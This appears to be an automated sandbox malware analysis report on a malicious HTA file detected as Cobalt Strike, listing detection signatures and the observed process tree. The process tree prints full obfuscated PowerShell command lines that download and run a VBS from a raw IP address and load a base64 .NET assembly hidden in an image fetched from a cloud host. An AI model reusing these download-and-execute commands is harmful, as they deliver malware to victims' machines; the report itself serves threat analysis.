Edit tour
Windows
Analysis Report
mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta
Overview
General Information
Detection
Cobalt Strike
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Detected Cobalt Strike Beacon
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Paste sharing url in reverse order
Sigma detected: Powershell download and load assembly
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Loading BitLocker PowerShell Module
Potential malicious VBS script found (suspicious strings)
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 6684 cmdline:
mshta.exe "C:\Users\ user\Deskt op\mniscre enthinking goodforent iretimegoo dfotbusube ssthings.h ta" MD5: 06B02D5C097C7DB1F109749C45F3F505) - cmd.exe (PID: 6944 cmdline:
"C:\Window s\system32 \cmd.exe" "/C PoWErs hELl -Ex byPaSs -Nop -w 1 -c DeVICECRe DenTIAldEP loYMEnt ; inVOKE-e XPRESsion( $(iNVOkE-e xPrEssIon( '[SYsTem.T eXt.EnCOdI NG]'+[char ]58+[char] 0X3a+'utf8 .GEtSTrIng ([SYSTEM.c onveRT]'+[ cHar]0X3A+ [CHaR]58+' fROMbaSE64 strIng('+[ CHAr]34+'J Dh3TTJ1VkQ zTSAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICA9I CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIEFERC1 UeXBFICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI C1NRW1CRXJ kRUZJTklUa U9OICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICd bRGxsSW1wb 3J0KCJ1ckx NT24iLCAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CBDaGFyU2V 0ID0gQ2hhc lNldC5Vbml jb2RlKV1wd WJsaWMgc3R hdGljIGV4d GVybiBJbnR QdHIgVVJMR G93bmxvYWR Ub0ZpbGUoS W50UHRyICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIEpaZFBhR k1ERXlMLHN 0cmluZyAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CBCUHNGc2J TUSxzdHJpb mcgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgcno sdWludCAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CBlWWhZLEl udFB0ciAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CBoRmJDZCk 7JyAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAtT kFNRSAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA iVFZBaVRZe HAiICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIC1 uQW1lc3BBY 0UgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgdXp GVHJGRWwgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgLVBhc3N UaHJ1OyAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAkOHdNMnV WRDNNOjpVU kxEb3dubG9 hZFRvRmlsZ SgwLCJodHR wOi8vNTcuM TI5LjU1LjI yNS8yMjUvZ WNvbm9taWN 0aGluZ3Nhc mVnb2luZ2F yb3VuZHdpd GhodXNiYW5 kd2l0aGdvb 2RuZXdzZ3J lYXRmb3Jld mVyeWJvZHl naXZlbi50S UYiLCIkZU5 WOkFQUERBV EFcZWNvbm9 taWN0aGluZ 3NhcmVnb2l uZ2Fyb3VuZ HdpdGhodXN iYW5kd2l0a Gdvb2RuZS5 2YnMiLDAsM Ck7U3RBclQ tU0xlRVAoM yk7aW5Wb0t FLUVYcHJlU 3NJb24gICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIiRlTnY6Q VBQREFUQVx lY29ub21pY 3RoaW5nc2F yZWdvaW5nY XJvdW5kd2l 0aGh1c2Jhb mR3aXRoZ29 vZG5lLnZic yI='+[ChaR ]0x22+'))' )))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6968 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7100 cmdline:
PoWErshELl -E x by PaSs -Nop -w 1 - c De VICECReDen TIAldEPloY MEnt ; i nVOKE-eXPR ESsion($(i NVOkE-exPr EssIon('[S YsTem.TeXt .EnCOdING] '+[char]58 +[char]0X3 a+'utf8.GE tSTrIng([S YSTEM.conv eRT]'+[cHa r]0X3A+[CH aR]58+'fRO MbaSE64str Ing('+[CHA r]34+'JDh3 TTJ1VkQzTS AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICA9ICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg IEFERC1UeX BFICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIC1N RW1CRXJkRU ZJTklUaU9O ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICdbRG xsSW1wb3J0 KCJ1ckxNT2 4iLCAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBD aGFyU2V0ID 0gQ2hhclNl dC5Vbmljb2 RlKV1wdWJs aWMgc3RhdG ljIGV4dGVy biBJbnRQdH IgVVJMRG93 bmxvYWRUb0 ZpbGUoSW50 UHRyICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIE paZFBhRk1E RXlMLHN0cm luZyAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBC UHNGc2JTUS xzdHJpbmcg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgcnosdW ludCAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBl WWhZLEludF B0ciAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBo RmJDZCk7Jy AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAtTkFN RSAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAiVF ZBaVRZeHAi ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIC1uQW 1lc3BBY0Ug ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgdXpGVH JGRWwgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg LVBhc3NUaH J1OyAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAk OHdNMnVWRD NNOjpVUkxE b3dubG9hZF RvRmlsZSgw LCJodHRwOi 8vNTcuMTI5 LjU1LjIyNS 8yMjUvZWNv bm9taWN0aG luZ3NhcmVn b2luZ2Fyb3 VuZHdpdGho dXNiYW5kd2 l0aGdvb2Ru ZXdzZ3JlYX Rmb3JldmVy eWJvZHlnaX Zlbi50SUYi LCIkZU5WOk FQUERBVEFc ZWNvbm9taW N0aGluZ3Nh cmVnb2luZ2 Fyb3VuZHdp dGhodXNiYW 5kd2l0aGdv b2RuZS52Yn MiLDAsMCk7 U3RBclQtU0 xlRVAoMyk7 aW5Wb0tFLU VYcHJlU3NJ b24gICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIi RlTnY6QVBQ REFUQVxlY2 9ub21pY3Ro aW5nc2FyZW dvaW5nYXJv dW5kd2l0aG h1c2JhbmR3 aXRoZ29vZG 5lLnZicyI= '+[ChaR]0x 22+'))'))) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - csc.exe (PID: 3604 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\e0waei52 \e0waei52. cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) - cvtres.exe (PID: 4304 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE SA4B4.tmp" "c:\Users \user\AppD ata\Local\ Temp\e0wae i52\CSC9C0 5B393FD244 8C976B42B5 7429CCF7.T MP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) - wscript.exe (PID: 6036 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\econo micthingsa regoingaro undwithhus bandwithgo odne.vbs" MD5: FF00E0480075B095948000BDC66E81F0) - powershell.exe (PID: 2492 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Command " if ($null -ne $PSVer sionTable -and $PSVe rsionTable .PSVersion -ne $null ) { [void] $PSVersion Table.PSVe rsion } el se { Write -Output 'P owerShell version No t availabl e' };if ($ null -ne $ PSVersionT able -and $PSVersion Table.PSVe rsion -ne $null) { [ void]$PSVe rsionTable .PSVersion } else { Write-Outp ut 'PowerS hell versi on Not ava ilable' }; $antisipho nal = 'htt ps://res.c loudinary. com/dzvai8 6uh/image/ upload/v17 34315244/m 3gtbqktvno cyvm410aa. jpg ';$orl age = New- Object Sys tem.Net.We bClient;$c entralised = $orlage .DownloadD ata($antis iphonal);$ slanshacks = [System .Text.Enco ding]::UTF 8.GetStrin g($central ised);$com mends = '< <BASE64_ST ART>>';$Le maitre = ' <<BASE64_E ND>>';$epe ndymis = $ slanshacks .IndexOf($ commends); $transcola tion = $sl anshacks.I ndexOf($Le maitre);$e pendymis - ge 0 -and $transcola tion -gt $ ependymis; $ependymis += $comme nds.Length ;$scribbla ge = $tran scolation - $ependym is;$dorsol umbar = $s lanshacks. Substring( $ependymis , $scribbl age);$kelt ologist = -join ($do rsolumbar. ToCharArra y() | ForE ach-Object { $_ })[- 1..-($dors olumbar.Le ngth)];$ca rinately = [System.C onvert]::F romBase64S tring($kel tologist); $brite = [ System.Ref lection.As sembly]::L oad($carin ately);$he lygia = [d nlib.IO.Ho me].GetMet hod('VAI') ;$helygia. Invoke($nu ll, @('0/q vVum/r/ee. etsap//:sp tth', 'cre ance', 'cr eance', 'c reance', ' CasPol', ' creance', 'creance', 'creance', 'creance', 'creance', 'creance', 'creance', '1','crean ce','TaskN ame'));if ($null -ne $PSVersio nTable -an d $PSVersi onTable.PS Version -n e $null) { [void]$PS VersionTab le.PSVersi on } else { Write-Ou tput 'Powe rShell ver sion Not a vailable' };if ($nul l -ne $PSV ersionTabl e -and $PS VersionTab le.PSVersi on -ne $nu ll) { [voi d]$PSVersi onTable.PS Version } else { Wri te-Output 'PowerShel l version Not availa ble' };" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 2132 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Networking |
---|
Source: | Author: Joe Security: |